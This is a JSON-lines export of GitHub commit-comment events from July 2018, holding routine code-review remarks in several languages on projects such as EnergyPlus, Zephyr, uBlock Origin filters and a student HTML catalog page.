{"id":"7988153904","type":"CommitCommentEvent","actor":{"login":"1017604426"},"repo":{"name":"1017604426/hello-word"},"payload":{"comment":{"id":29762144,"position":3,"line":3,"path":"README.md","commit_id":"4982da9f444ca3cb177acfd86151a492b71f5c30","created_at":"2018-07-19T10:04:02Z","updated_at":"2018-07-19T10:04:02Z","author_association":"OWNER","body":"不是吧"}},"created_at":"2018-07-19T10:04:02Z"}
{"id":"7988157647","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29762153,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-19T10:04:45Z","updated_at":"2018-07-19T10:04:45Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1676 of 1676 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.32%25-green.png)</a>\n"}},"created_at":"2018-07-19T10:04:45Z"}
{"id":"7988158909","type":"CommitCommentEvent","actor":{"login":"ValeriiMalkov"},"repo":{"name":"smartdevicelink/sdl_hmi"},"payload":{"comment":{"id":29762155,"position":145,"line":474,"path":"ffw/RCRPC.js","commit_id":"62bf1f8ae58134ba82c1245e8236bc4d5587affd","created_at":"2018-07-19T10:05:00Z","updated_at":"2018-07-19T10:05:00Z","author_association":"NONE","body":"@olohvinenko That was fixed in commit beccc7db030a4ab6216e0094cfb31774c267d4c0"}},"created_at":"2018-07-19T10:05:00Z"}
{"id":"7988159058","type":"CommitCommentEvent","actor":{"login":"BetsyTeng"},"repo":{"name":"BetsyTeng/Personal-website"},"payload":{"comment":{"id":29762156,"position":null,"line":null,"path":null,"commit_id":"42f79546ecd8565a912730b0b0f587ebe2e7cc3a","created_at":"2018-07-19T10:05:02Z","updated_at":"2018-07-19T10:05:02Z","author_association":"OWNER","body":"改背景颜色"}},"created_at":"2018-07-19T10:05:02Z"}
{"id":"7988160994","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29762160,"position":null,"line":null,"path":null,"commit_id":"7e549789cc7b97d96d816ccef570709dada6af16","created_at":"2018-07-19T10:05:24Z","updated_at":"2018-07-19T10:05:24Z","author_association":"OWNER","body":"### verification_code program:\r\n```\r\n#Downtiser\r\nimport random\r\n\r\ncode=''\r\n\r\nfor i in range(6):\r\n    flag=random.randint(1,2)\r\n    if flag==1:\r\n        subcode=chr(random.randint(65,90))\r\n\r\n    else:\r\n        subcode=str(random.randint(0,9))\r\n\r\n    code+=subcode\r\nprint(code)\r\n\r\n```"}},"created_at":"2018-07-19T10:05:24Z"}
{"id":"7988161457","type":"CommitCommentEvent","actor":{"login":"Shashank2406"},"repo":{"name":"blackuy/react-native-twilio-video-webrtc"},"payload":{"comment":{"id":29762163,"position":null,"line":null,"path":null,"commit_id":"1e27e37c58d73c66dcdc4ec32ecab10ad7cf0187","created_at":"2018-07-19T10:05:29Z","updated_at":"2018-07-19T10:05:29Z","author_association":"NONE","body":"Getting the issue below after this merge\r\nRCTTWSerializable.h:21:12: error: cannot find interface declaration for 'TVITrackPublication'\r\n@interface TVITrackPublication(RCTTWSerializable)<RCTTWSerializable>"}},"created_at":"2018-07-19T10:05:29Z"}
{"id":"7988164160","type":"CommitCommentEvent","actor":{"login":"Marouanefajat"},"repo":{"name":"Marouanefajat/Repository-"},"payload":{"comment":{"id":29762169,"position":null,"line":null,"path":null,"commit_id":"cbcd9862b6a43a1e3c6bb1ead0a81d9addde6481","created_at":"2018-07-19T10:06:00Z","updated_at":"2018-07-19T10:06:00Z","author_association":"OWNER","body":"didnt work."}},"created_at":"2018-07-19T10:06:00Z"}
{"id":"7988165969","type":"CommitCommentEvent","actor":{"login":"pjdelport"},"repo":{"name":"buza-project/buza-website"},"payload":{"comment":{"id":29762171,"position":5,"line":12,"path":"src/buza/templates/buza/question_list.html","commit_id":"4ed55a09db6476c4d89027038479a38b85f2c9f6","created_at":"2018-07-19T10:06:19Z","updated_at":"2018-07-19T10:06:19Z","author_association":"MEMBER","body":"Good catch!\r\n\r\nWe could also change this to `question.author.get_full_name`, rather than the `username`."}},"created_at":"2018-07-19T10:06:19Z"}
{"id":"7988175996","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762191,"position":52,"line":52,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:08:16Z","updated_at":"2018-07-19T10:08:16Z","author_association":"NONE","body":"![screenshot_1](https://user-images.githubusercontent.com/13052951/42936323-737968c2-8b54-11e8-8165-731d48adfb1f.png)\r\n\r\nв этом блоке всё строчки одинаковые\r\nможно дать им одинаковые классы\r\n\r\nлучше сделать примерно так\r\n\r\n``` html\r\n<ul class=\"item__parametrs\">\r\n  <li class=\"item__parametr\">\r\n     <span>...</span>\r\n     <span>...</span>\r\n  </li>\r\n</ul>\r\n\r\n```\r\n"}},"created_at":"2018-07-19T10:08:16Z"}
{"id":"7988176267","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29762192,"position":54,"line":1075,"path":"src/DotVVM.Framework/Resources/Scripts/DotVVM.ts","commit_id":"3f4fb5acbe8b943317bedf9bf105664cdd2b026a","created_at":"2018-07-19T10:08:18Z","updated_at":"2018-07-19T10:08:18Z","author_association":"CONTRIBUTOR","body":"We have agreed with @adamjez that we can't change this, as it can be used for CSS selectors and it would be a nasty breaking change. Unfortunately. "}},"created_at":"2018-07-19T10:08:18Z"}
{"id":"7988176445","type":"CommitCommentEvent","actor":{"login":"PointlessOtter"},"repo":{"name":"PointlessOtter/faceapp"},"payload":{"comment":{"id":29762193,"position":null,"line":null,"path":null,"commit_id":"59aef33711957d6037496d9e874b9cb5525679aa","created_at":"2018-07-19T10:08:20Z","updated_at":"2018-07-19T10:08:20Z","author_association":"OWNER","body":"Ready"}},"created_at":"2018-07-19T10:08:20Z"}
{"id":"7988181020","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762206,"position":53,"line":53,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:09:16Z","updated_at":"2018-07-19T10:09:16Z","author_association":"NONE","body":"`catalog__item-order order` -> `item__button`"}},"created_at":"2018-07-19T10:09:16Z"}
{"id":"7988181449","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29762207,"position":null,"line":null,"path":null,"commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-19T10:09:21Z","updated_at":"2018-07-19T10:09:21Z","author_association":"CONTRIBUTOR","body":"@sdogruyol Bikeshedding? Yes, if you mean all that needless conversation for something that shouldn't be there in the first place. No, if you mean added complexity for nothing.\r\n\r\n@RX14 I haven't seen anywhere else one example of such, ermm... _creative_ approach for making life harder for yourself and other contributors. Can't wait for the comments on next releases, where from now on you'll have not one but two places to update the version string (and it just got automated in `VERSION` constant...)"}},"created_at":"2018-07-19T10:09:21Z"}
{"id":"7988182099","type":"CommitCommentEvent","actor":{"login":"xuqiang941026"},"repo":{"name":"xuqiang941026/xuqiang"},"payload":{"comment":{"id":29762210,"position":2,"line":2,"path":".idea/xuqiang.iml","commit_id":"bd63d77879fccda94a18f906f31b5342b11cf3a5","created_at":"2018-07-19T10:09:29Z","updated_at":"2018-07-19T10:09:29Z","author_association":"OWNER","body":"we"}},"created_at":"2018-07-19T10:09:29Z"}
{"id":"7988188788","type":"CommitCommentEvent","actor":{"login":"sewagodimo"},"repo":{"name":"buza-project/buza-website"},"payload":{"comment":{"id":29762226,"position":5,"line":12,"path":"src/buza/templates/buza/question_list.html","commit_id":"4ed55a09db6476c4d89027038479a38b85f2c9f6","created_at":"2018-07-19T10:10:45Z","updated_at":"2018-07-19T10:10:45Z","author_association":"COLLABORATOR","body":"awesome!  `{{question.author.get_full_name| default = question.author.username}}`?"}},"created_at":"2018-07-19T10:10:45Z"}
{"id":"7988191681","type":"CommitCommentEvent","actor":{"login":"mirzaKarahan"},"repo":{"name":"mirzaKarahan/android-java-parse-platform"},"payload":{"comment":{"id":29762237,"position":4,"line":5,"path":"app/src/main/AndroidManifest.xml","commit_id":"eb1ef120b4b716559dd88bf7d877a7eb6b4836ec","created_at":"2018-07-19T10:11:21Z","updated_at":"2018-07-19T10:11:21Z","author_association":"OWNER","body":"İnternet izini"}},"created_at":"2018-07-19T10:11:21Z"}
{"id":"7988192053","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762238,"position":53,"line":53,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:11:26Z","updated_at":"2018-07-19T10:11:26Z","author_association":"NONE","body":"если в проекте много таких зелёных кнопок то можно дать кнопке дополнительный класс `button` \r\nто есть она будет ещё и отдельным блоком\r\nи цветовые текстовые стили повесить на класс `button` чтобы везде его использовать\r\n\r\nа уже стили ширин и позиционирования можно вешать на класс, который говорит, что эта кнопка элемент блока\r\nв нашем случае элемент блока `item`"}},"created_at":"2018-07-19T10:11:26Z"}
{"id":"7988195570","type":"CommitCommentEvent","actor":{"login":"haakonnessjoen"},"repo":{"name":"bitfocus/companion"},"payload":{"comment":{"id":29762249,"position":null,"line":null,"path":null,"commit_id":"f23a3b05560c8fc4270467e5a93882f61f2659ea","created_at":"2018-07-19T10:12:09Z","updated_at":"2018-07-19T10:12:09Z","author_association":"MEMBER","body":"Please do :)"}},"created_at":"2018-07-19T10:12:09Z"}
{"id":"7988195647","type":"CommitCommentEvent","actor":{"login":"elmigbot"},"repo":{"name":"hassio-addons/addon-node-red"},"payload":{"comment":{"id":29762250,"position":null,"line":null,"path":null,"commit_id":"43c8adda9338f79f0e5829bc2a4d630b434855eb","created_at":"2018-07-19T10:12:10Z","updated_at":"2018-07-19T10:12:10Z","author_association":"NONE","body":"Curious why? After modifying what it broke, it worked better (for me)."}},"created_at":"2018-07-19T10:12:10Z"}
{"id":"7988197235","type":"CommitCommentEvent","actor":{"login":"dimisa-RUAdList"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29762257,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T10:12:28Z","updated_at":"2018-07-19T10:12:28Z","author_association":"NONE","body":"These rules will have to be prescribed for each individual website. Maybe it's possible to make an analog of ABP-rewrite (https://adblockplus.org/development-builds/rewriting-url-instead-of-blocking) to block such advertising globally?\r\n\r\nFor example:\r\n`/(^https?:\\/\\/([^.]+\\.)*piguiqproxy\\.com\\/).*/$rewrite=$1\r\n/(^https?:\\/\\/([^.]+\\.)*zmctrack\\.net\\/).*/$rewrite=$1\r\n/(^https?:\\/\\/([^.]+\\.)*amgload\\.net\\/).*/$rewrite=$1\r\n/(^https?:\\/\\/([^.]+\\.)*rcdn\\.pro\\/).*/$rewrite=$1`"}},"created_at":"2018-07-19T10:12:28Z"}
{"id":"7988197910","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762259,"position":178,"line":178,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:12:37Z","updated_at":"2018-07-19T10:12:37Z","author_association":"NONE","body":"можно покороче название придумать например\r\n`more-products` -> `extra` "}},"created_at":"2018-07-19T10:12:37Z"}
{"id":"7988200853","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762267,"position":180,"line":180,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:13:13Z","updated_at":"2018-07-19T10:13:13Z","author_association":"NONE","body":"здесь `more-products__wrapper` нужен и это сразу видно, так как у нас 2 колонки)"}},"created_at":"2018-07-19T10:13:13Z"}
{"id":"7988202630","type":"CommitCommentEvent","actor":{"login":"arekkas"},"repo":{"name":"flow-typed/flow-typed"},"payload":{"comment":{"id":29762274,"position":20,"line":63,"path":"definitions/npm/react-redux_v5.x.x/flow_v0.63.0-/react-redux_v5.x.x.js","commit_id":"c5d8a135ce136817172c7d31e36225b223c09e17","created_at":"2018-07-19T10:13:34Z","updated_at":"2018-07-19T10:13:34Z","author_association":"NONE","body":"I think that changing this from DispatchProps to StateProps causes https://github.com/flow-typed/flow-typed/issues/2518"}},"created_at":"2018-07-19T10:13:34Z"}
{"id":"7988203842","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29762276,"position":null,"line":null,"path":null,"commit_id":"24f65dc46bffe350634d798efd9e58a5c06366a7","created_at":"2018-07-19T10:13:49Z","updated_at":"2018-07-19T10:13:49Z","author_association":"NONE","body":"exposed\r\n"}},"created_at":"2018-07-19T10:13:49Z"}
{"id":"7988205906","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762287,"position":186,"line":186,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:14:14Z","updated_at":"2018-07-19T10:14:14Z","author_association":"NONE","body":"`more-products__item-order order` вот тут как раз можно будет сделать о о чем выше писала)\r\n\r\n`more-products__button button`"}},"created_at":"2018-07-19T10:14:14Z"}
{"id":"7988211946","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29762297,"position":4,"line":19,"path":"src/main/java/me/totalfreedom/totalfreedommod/TotalFreedomMod.java","commit_id":"6eaf4c8d3e416fce34a659b8af332d21fb9d3943","created_at":"2018-07-19T10:15:26Z","updated_at":"2018-07-19T10:15:26Z","author_association":"CONTRIBUTOR","body":"You have 2 same imports but one is commented out..."}},"created_at":"2018-07-19T10:15:26Z"}
{"id":"7988213351","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762303,"position":213,"line":213,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:15:44Z","updated_at":"2018-07-19T10:15:44Z","author_association":"NONE","body":"блок `invitation` нужно будет внести в `more-products__wrapper` после списка\r\nтак как нам нужно будет их рядом в 2 колонки ставить"}},"created_at":"2018-07-19T10:15:44Z"}
{"id":"7988218061","type":"CommitCommentEvent","actor":{"login":"vyaritenko"},"repo":{"name":"vyaritenko/firstWebSite"},"payload":{"comment":{"id":29762309,"position":null,"line":null,"path":null,"commit_id":"b63298139f784a4db1cbdce54fde4e98c5b8cf1c","created_at":"2018-07-19T10:16:41Z","updated_at":"2018-07-19T10:16:41Z","author_association":"OWNER","body":"\r\nEnvironment: Tomcat 8, RDBMS, Log4j\r\n\r\nРазработать WEB-приложение, которое поддерживает заданную функциональность.\r\nТребования к реализации следующие.\r\n\r\n1. На основе сущностей предметной области создать классы которые им соответствуют.\r\n2. Классы и методы должны иметь названия, которые отражают их функциональность, классы должны быть грамотно разнесены по пакетам. \r\n3. Оформление кода должно соответствовать Java Code Convention.\r\n4. Информацию о предметной области хранить в базе данных (любая RDBMS, предпочтительно MySQL).\r\n5. Для доступа к данным использовать API JDBC с использованием пула соединений (не допускается использование ORM фреймверков).\r\n6. Архитектура приложения должна соответствовать шаблону MVC (не допускается использование MVC фреймверков).\r\n7. Приложение должно поддерживать работу с кириллицей (быть многоязычным), в том числе при хранении информации в базе данных:\r\n    1) должна быть возможность переключения языка интерфейса;\r\n    2) должна быть поддержка ввода, вывода и хранения информации, записанной на разных языках;\r\n    3) в качестве поддерживаемых языков выбрать минимум два:\r\n        * на основе кириллицы\r\n        * на основе латиницы\r\n9. При реализации алгоритмов бизнес-логики использовать шаблоны проектирования.\r\n10. Используя сервлеты и JSP, реализовать функциональность, приведенную в постановке задачи.\r\n11. В качестве контейнера сервлетов использовать Apache Tomcat.\r\n12. На страницах JSP применять теги из библиотеки JSTL и разработанные собственные теги:\r\n    * как минимум один custom tag library тег\r\n    * как минимум один tag file тег.\r\n13. При разработке использовать сессии, фильтры, слушатели.\r\n14. Использовать журналирование событий с использованием библиотеки Apache Log4j или Logback.\r\n15. Код должен содержать комментарии документатора для:\r\n    * типов верхнего уровня;\r\n    * нетривиальных методов;\r\n    * конструкторов.\r\n16. Написать модульные тесты которые по максимуму покрывают функциональность.\r\n17. Самостоятельно расширить постановку задачи по функциональности.\r\n\r\n________________\r\n\r\nДополнительно, к требованиям изложенным выше, целесообразно также обеспечить выполнение следующих требований.\r\n\r\n1. Реализовать разграничение прав доступа пользователей системы к компонентам приложения.\r\nСистема должна запретить доступ к содержимому страницы, просматривать которую имеет право только администратор, если пользователь напрямую попробует обратиться к этой странице при помощи ввода соответствующего GET запроса в адресной строке браузера.\r\n\r\n2. Реализовать защиту от повторной отправки данных на сервер при обновлении страницы.\r\nТакого поведения можно добиться при помощи паттерна PRG.\r\n\r\n3. Все поля ввода должны быть с валидацией данных.\r\nЕсли поле предназначено для ввода целых значений, то это означает, что оно не должно принимать буквы. Работа с датами должна обеспечивать проверку на валидность учитывая контекст, например, нельзя разрешить системе, которая работает с ж.д. билетами, заказать билет на поезд, который ушел еще в прошлом году. и т.п.\r\n"}},"created_at":"2018-07-19T10:16:41Z"}
{"id":"7988219192","type":"CommitCommentEvent","actor":{"login":"mnestor"},"repo":{"name":"ChargingBreak/chargingbreak-frontend"},"payload":{"comment":{"id":29762311,"position":33,"line":29,"path":"src/store/modules/auth.js","commit_id":"e97ab0e37e98038b4a4fe8b922d44c946ae0f0cb","created_at":"2018-07-19T10:16:54Z","updated_at":"2018-07-19T10:16:54Z","author_association":"CONTRIBUTOR","body":"This was to cleanup the url. when you auth you wind up with /?code=sajhdfasdfasd"}},"created_at":"2018-07-19T10:16:54Z"}
{"id":"7988221261","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29762314,"position":28,"line":74,"path":"src/main/java/me/totalfreedom/totalfreedommod/fun/Jumppads.java","commit_id":"6eaf4c8d3e416fce34a659b8af332d21fb9d3943","created_at":"2018-07-19T10:17:19Z","updated_at":"2018-07-19T10:17:19Z","author_association":"CONTRIBUTOR","body":"Pretty sure this (and others) won't work since it would be equal to `List<Material>` instead of `Material`. I may be wrong."}},"created_at":"2018-07-19T10:17:19Z"}
{"id":"7988226557","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"kipcole9/cldr"},"payload":{"comment":{"id":29762322,"position":null,"line":null,"path":null,"commit_id":"e61955a776edef79a193f8d58e45fb62552cda00","created_at":"2018-07-19T10:18:24Z","updated_at":"2018-07-19T10:18:24Z","author_association":"NONE","body":"No problem! Generally speaking, if you need to achieve something and it is not possible with public APIs, please let us know, as we can figure out something we would be happy with exposing. :)"}},"created_at":"2018-07-19T10:18:24Z"}
{"id":"7988228152","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762324,"position":213,"line":213,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:18:44Z","updated_at":"2018-07-19T10:18:44Z","author_association":"NONE","body":"`invitation` такой же блок на главной есть `contacts`  \r\nи ты его можешь сюда просто перенести)\r\nа то так получаются одинаковые блоки с разными классами)"}},"created_at":"2018-07-19T10:18:44Z"}
{"id":"7988231652","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29762330,"position":74,"line":206,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/CleanroomChunkGenerator.java","commit_id":"6eaf4c8d3e416fce34a659b8af332d21fb9d3943","created_at":"2018-07-19T10:19:24Z","updated_at":"2018-07-19T10:19:24Z","author_association":"CONTRIBUTOR","body":"Why does this return to only one world, you know we got more than one world that needs to be loaded."}},"created_at":"2018-07-19T10:19:24Z"}
{"id":"7988233277","type":"CommitCommentEvent","actor":{"login":"Py0zz1"},"repo":{"name":"Py0zz1/pcap_test"},"payload":{"comment":{"id":29762335,"position":141,"line":141,"path":"main.cpp","commit_id":"1f19a513866a743bb9e877507a8ccee9996a3809","created_at":"2018-07-19T10:19:43Z","updated_at":"2018-07-19T10:19:43Z","author_association":"OWNER","body":"네 수정했습니다!"}},"created_at":"2018-07-19T10:19:43Z"}
{"id":"7988235963","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29762344,"position":14,"line":59,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/AdminWorld.java","commit_id":"6eaf4c8d3e416fce34a659b8af332d21fb9d3943","created_at":"2018-07-19T10:20:16Z","updated_at":"2018-07-19T10:20:16Z","author_association":"CONTRIBUTOR","body":"What's wrong with `getName()` argument?"}},"created_at":"2018-07-19T10:20:16Z"}
{"id":"7988237105","type":"CommitCommentEvent","actor":{"login":"Py0zz1"},"repo":{"name":"Py0zz1/pcap_test"},"payload":{"comment":{"id":29762347,"position":135,"line":135,"path":"main.cpp","commit_id":"1f19a513866a743bb9e877507a8ccee9996a3809","created_at":"2018-07-19T10:20:30Z","updated_at":"2018-07-19T10:20:30Z","author_association":"OWNER","body":"바이트 오더링때문에 4랑 5랑 바껴서 들어왔었는데, 이걸 수정안했었네요.. 수정했습니다!"}},"created_at":"2018-07-19T10:20:30Z"}
{"id":"7988238531","type":"CommitCommentEvent","actor":{"login":"Py0zz1"},"repo":{"name":"Py0zz1/pcap_test"},"payload":{"comment":{"id":29762348,"position":73,"line":73,"path":"main.cpp","commit_id":"1f19a513866a743bb9e877507a8ccee9996a3809","created_at":"2018-07-19T10:20:49Z","updated_at":"2018-07-19T10:20:49Z","author_association":"OWNER","body":"Total Length로 수정했습니다^^7"}},"created_at":"2018-07-19T10:20:49Z"}
{"id":"7988243265","type":"CommitCommentEvent","actor":{"login":"fsarradin"},"repo":{"name":"UNIVALENCE/Zoom"},"payload":{"comment":{"id":29762353,"position":null,"line":null,"path":null,"commit_id":"8e6ec824dd1cf1b617b38c5f73d918d7c9f902fd","created_at":"2018-07-19T10:21:47Z","updated_at":"2018-07-19T10:21:47Z","author_association":"NONE","body":"Le répertoire `project/` a disparu"}},"created_at":"2018-07-19T10:21:47Z"}
{"id":"7988244641","type":"CommitCommentEvent","actor":{"login":"safwanrahman"},"repo":{"name":"rtfd/readthedocs.org"},"payload":{"comment":{"id":29762357,"position":7,"line":20,"path":"readthedocs/projects/signals.py","commit_id":"ce4abaf9324f493a37b2549dce55dc4952228ad1","created_at":"2018-07-19T10:22:06Z","updated_at":"2018-07-19T10:22:06Z","author_association":"MEMBER","body":"I was also thinking about having the logic here. Later I have thought that in future there maybe some case where the `HTMLFiles` are created from other place like directly pushing documentation from CI. In that case, we need to have the logic over there also.\r\nMoreover, I would prefer to have the Search logic separate from the build logic. So its easier in future if we would like to seperate the search application.\r\n\r\nI do not have strong preference to keep the signal. If you think we should keep it here, I can implement the logic here."}},"created_at":"2018-07-19T10:22:06Z"}
{"id":"7988247668","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29762365,"position":null,"line":null,"path":null,"commit_id":"d86e169b2bebc0b2051a02d6c815f89e645abc8e","created_at":"2018-07-19T10:22:43Z","updated_at":"2018-07-19T10:22:43Z","author_association":"COLLABORATOR","body":"浅田\r\n質問です。\r\nfor文における判定値を前置インクリメントから後置インクリメントに変更されたことに理由はありますか？"}},"created_at":"2018-07-19T10:22:43Z"}
{"id":"7988248795","type":"CommitCommentEvent","actor":{"login":"zsinay7"},"repo":{"name":"ParkresOrg/documents"},"payload":{"comment":{"id":29762366,"position":null,"line":null,"path":null,"commit_id":"25fd394d5300aaf14462f7e8077f7c53dda8b7d0","created_at":"2018-07-19T10:22:57Z","updated_at":"2018-07-19T10:22:57Z","author_association":"NONE","body":"[Parkreswhitepaper bitti x.pdf](https://github.com/ParkresOrg/documents/files/2209466/Parkreswhitepaper.bitti.x.pdf)\r\n"}},"created_at":"2018-07-19T10:22:57Z"}
{"id":"7988251630","type":"CommitCommentEvent","actor":{"login":"SavinayDharmappa"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29762374,"position":4,"line":355,"path":"CMakeLists.txt","commit_id":"e6bf79b0c28048708aa4e7776cd457f525c16037","created_at":"2018-07-19T10:23:32Z","updated_at":"2018-07-19T10:23:32Z","author_association":"COLLABORATOR","body":"previous implementation (i. e. 909dd7) had version_header.h and version.c specific to the board (i. e arduino_101). I thought of making it generic and couldn't find right placeholder to have the version related files. So decided to generate version_header.h . "}},"created_at":"2018-07-19T10:23:32Z"}
{"id":"7988254479","type":"CommitCommentEvent","actor":{"login":"SavinayDharmappa"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29762378,"position":45,"line":45,"path":"scripts/gen_version_header.py","commit_id":"e6bf79b0c28048708aa4e7776cd457f525c16037","created_at":"2018-07-19T10:24:07Z","updated_at":"2018-07-19T10:24:07Z","author_association":"COLLABORATOR","body":"I will add those member."}},"created_at":"2018-07-19T10:24:07Z"}
{"id":"7988258748","type":"CommitCommentEvent","actor":{"login":"SavinayDharmappa"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29762385,"position":24,"line":24,"path":"scripts/gen_version_header.py","commit_id":"e6bf79b0c28048708aa4e7776cd457f525c16037","created_at":"2018-07-19T10:24:59Z","updated_at":"2018-07-19T10:24:59Z","author_association":"COLLABORATOR","body":"I will add those members."}},"created_at":"2018-07-19T10:24:59Z"}
{"id":"7988283216","type":"CommitCommentEvent","actor":{"login":"whiterandrek"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29762415,"position":25,"line":161,"path":"engines/pink/pink.cpp","commit_id":"a053a19ca258dc4d344bc2345b5faa1bf2b0183e","created_at":"2018-07-19T10:30:01Z","updated_at":"2018-07-19T10:30:01Z","author_association":"MEMBER","body":"no other way to call **protected** function"}},"created_at":"2018-07-19T10:30:01Z"}
{"id":"7988283909","type":"CommitCommentEvent","actor":{"login":"nathanbegbie"},"repo":{"name":"praekelt/molo-gem"},"payload":{"comment":{"id":29762419,"position":null,"line":null,"path":null,"commit_id":"07e2e227b353170ea8372b40d41688a970910b48","created_at":"2018-07-19T10:30:10Z","updated_at":"2018-07-19T10:30:10Z","author_association":"CONTRIBUTOR","body":"@sewagodimo I think the `dump.rdb` file was added by mistake. Please could you remove it with `git rm dump.rdb` and add this file type to the `.gitignore` file? \r\nFrom [some docs](https://github.com/sripathikrishnan/redis-rdb-tools/wiki/Redis-RDB-Dump-File-Format):\r\n> Redis *.rdb file is a binary representation of the in-memory store. This binary file is sufficient to completely restore Redis’ state."}},"created_at":"2018-07-19T10:30:10Z"}
{"id":"7988286654","type":"CommitCommentEvent","actor":{"login":"SavinayDharmappa"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29762425,"position":45,"line":45,"path":"scripts/gen_version_header.py","commit_id":"e6bf79b0c28048708aa4e7776cd457f525c16037","created_at":"2018-07-19T10:30:41Z","updated_at":"2018-07-19T10:30:41Z","author_association":"COLLABORATOR","body":"I wanted version_header.h to be generated at build time. "}},"created_at":"2018-07-19T10:30:41Z"}
{"id":"7988290253","type":"CommitCommentEvent","actor":{"login":"KevinLeigh"},"repo":{"name":"vsch/flexmark-java"},"payload":{"comment":{"id":29762433,"position":14,"line":217,"path":"pom.xml","commit_id":"975c6da410f635bbc683b3091d712ae9f62c0797","created_at":"2018-07-19T10:31:26Z","updated_at":"2018-07-19T10:31:26Z","author_association":"NONE","body":"A maven property for version could reduce the amount of lines needed to update when updating the version."}},"created_at":"2018-07-19T10:31:26Z"}
